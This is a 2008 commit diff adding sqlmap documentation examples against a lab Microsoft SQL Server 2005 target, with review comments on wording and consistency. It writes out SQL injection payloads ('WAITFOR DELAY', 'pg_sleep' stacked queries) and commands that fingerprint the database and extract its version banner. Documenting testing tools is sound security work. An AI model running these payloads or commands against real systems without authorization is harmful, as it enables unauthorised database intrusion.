Updated documentation

This commit is contained in:
Bernardo Damele
2008-12-17 20:17:34 +00:00
parent dda62ba463
commit 94c79e3209
4 changed files with 211 additions and 2 deletions


@@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
--stacked-test -v 1
[...]
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
</verb></tscreen>
<sect2>Test for Time based blind SQL injection
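Review bot: the added paragraph only says the application "supports stacked queries", but the captured lines show what that verdict actually rests on: the reported payload ends in `WAITFOR DELAY '0:0:5'` and the log jumps from `[hh:mm:09]` to `[hh:mm:23]`, i.e. the test infers support from an observed response delay. One sentence stating that the check is delay-based would help readers understand why it can miss on slow or noisy links, and would match how the time-based section that follows describes its own test.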
@@ -1839,6 +1854,23 @@ with stacked query syntax
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
--time-test -v 1
[...]
back-end DBMS: Microsoft SQL Server 2005
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
</verb></tscreen>
<sect2>Test for UNION query SQL injection
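Review bot: the four log lines in this example carry real clock timestamps (`[15:32:59]`, `[15:33:13]`), whereas the stacked-query example added in the previous hunk and the fingerprint examples added later in this commit all use the `[hh:mm:ss]` placeholder form. Normalise them to `[hh:mm:59]` and `[hh:mm:13]` so the examples in this file read consistently and the anonymisation convention is kept.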
@@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
html error message fingerprint: Microsoft SQL Server
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
[...]
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
[hh:mm:51] [INFO] testing Microsoft SQL Server
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
[hh:mm:51] [INFO] retrieved: 1
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
[hh:mm:51] [INFO] retrieved: 5
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
web server operating system: Windows 2003 or 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
html error message fingerprint: Microsoft SQL Server
</verb></tscreen>
<p>
If you want an even more accurate result, based also on banner parsing,
you can also provide the <tt>-b</tt> or <tt>--banner</tt> option.
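Review bot: the quoted output line `[WARNING] the back-end DMBS is not PostgreSQL` misspells `DBMS` as `DMBS`; since this is a verbatim capture, the typo originates in the message string sqlmap emits and should be fixed in the source that prints it rather than edited in the documentation, otherwise the doc faithfully reproduces the misspelling. The same line is captured again in the `-f -b` example added further down, so both will need refreshing once the string is corrected.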
@@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
[...]
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
[...]
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
[hh:mm:03] [INFO] testing Microsoft SQL Server
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
[hh:mm:03] [INFO] retrieved: 1
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
[hh:mm:03] [INFO] retrieved: 5
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
[hh:mm:03] [INFO] query: @@VERSION
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
web server operating system: Windows 2003 or 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS operating system: Windows 2003 Service Pack 1
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
version 9.00.1399
html error message fingerprint: Microsoft SQL Server
[...]
</verb></tscreen>
<p>
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
correctly identify the database management system patch level.
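Review bot: the closing sentence credits the banner with the correct patch level but does not mention what the example itself shows about cost: each fingerprint probe reports `performed 13 queries in 0 seconds`, while retrieving `@@VERSION` reports `performed 1343 queries in 11 seconds`, because the whole banner string has to be pulled through the injection. A sentence noting that `-b` is considerably more expensive than `-f` alone would set expectations, and it would also be worth stating that the `Service Pack 0` in the banner-parsing line is derived from the `9.00.1399` build number shown just below it.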
@@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
---
</verb></tscreen>
<p>
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
---
</verb></tscreen>
<sect2>Current user